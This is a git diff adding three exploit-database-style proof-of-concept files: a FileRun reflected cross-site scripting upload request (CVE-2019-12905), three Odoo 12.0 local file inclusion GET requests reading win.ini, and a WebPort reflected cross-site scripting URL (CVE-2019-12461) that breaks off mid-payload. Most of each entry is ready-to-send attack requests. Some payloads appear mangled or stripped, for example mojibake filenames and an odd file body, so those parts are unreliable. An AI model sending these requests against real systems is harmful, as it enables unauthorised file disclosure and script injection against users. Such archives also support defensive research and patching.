diff --git a/exploits/multiple/webapps/48607.txt b/exploits/multiple/webapps/48607.txt new file mode 100644 index 000000000..4b60ef2d3 --- /dev/null +++ b/exploits/multiple/webapps/48607.txt @@ -0,0 +1,62 @@ +# Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting +# Date: 2019-07-01 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://www.filerun.com/ +# Software Link: https://filerun.com/download +# Version: v2019.05.21 +# Tested on: Windows/Linux +# CVE: CVE-2019-12905 + +# CVE-2019-12905 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905 +# https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3 + +# PoC + +To exploit vulnerability, someone could upload an allowed file named “> to impact users who open the page. + +POST /filerun/?module=fileman§ion=do&page=up HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://172.16.191.129/filerun/ +Content-Type: multipart/form-data; +boundary=---------------------------142096305821079611661465592403 +Content-Length: 6034 +DNT: 1 +Connection: close +Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5 + +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowTotalSize" + +5100 +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowIsFirstChunk" + +1 +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowIsLastChunk" + +1 +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="flowFilename" + +â��>.jpg +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="path" + +/ROOT/HOME +-----------------------------142096305821079611661465592403 +Content-Disposition: form-data; name="file"; filename="â��>.jpg" +Content-Type: image/jpg + +<%@ I said you should learn! %> + + +-----------------------------142096305821079611661465592403-- \ No newline at end of file diff --git a/exploits/multiple/webapps/48609.txt b/exploits/multiple/webapps/48609.txt new file mode 100644 index 000000000..5ecdf7e72 --- /dev/null +++ b/exploits/multiple/webapps/48609.txt @@ -0,0 +1,57 @@ +# Exploit Title: Odoo 12.0 - Local File Inclusion +# Date: 2019-06-14 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://www.odoo.com/ +# Software Link: https://www.odoo.com/tr_TR/page/download +# Version: v12.0 +# Tested on: Windows/Linux +# https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities +# https://www.odoo.com/security-report + +# PoC-1 +To exploit vulnerability, someone could use +'http://[HOST]:8069/base_import/static/c:/windows/win.ini' +request to get some information from the target. + +GET /base_import/static/c:/windows/win.ini HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +# PoC-2 +To exploit vulnerability, someone could use 'http://[HOST]:8069/ +web/static/c:/windows/win.ini' request to get some information from the +target. + +GET /web/static/c:/windows/win.ini HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +# PoC-3 +To exploit vulnerability, someone could use 'http://[HOST]:8069/ +base/static/c:/windows/win.ini' request to get some information from the +target. + +GET /base/static/c:/windows/win.ini HTTP/1.1 +Host: [TARGET] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) +Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/multiple/webapps/48611.txt b/exploits/multiple/webapps/48611.txt new file mode 100644 index 000000000..5f55df603 --- /dev/null +++ b/exploits/multiple/webapps/48611.txt @@ -0,0 +1,30 @@ +# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting +# Date: 2019-05-30 +# Exploit Author: Emre ÖVÜNÇ +# Vendor Homepage: https://webport.se/ +# Software Link: https://webport.se/nedladdningar/ +# Version: v1.19.1 +# Tested on: Windows/Linux +# CVE-2019-12461 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461 +# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS + +# PoC + +To exploit vulnerability, someone could use 'http:// +[server]:8090/log?type="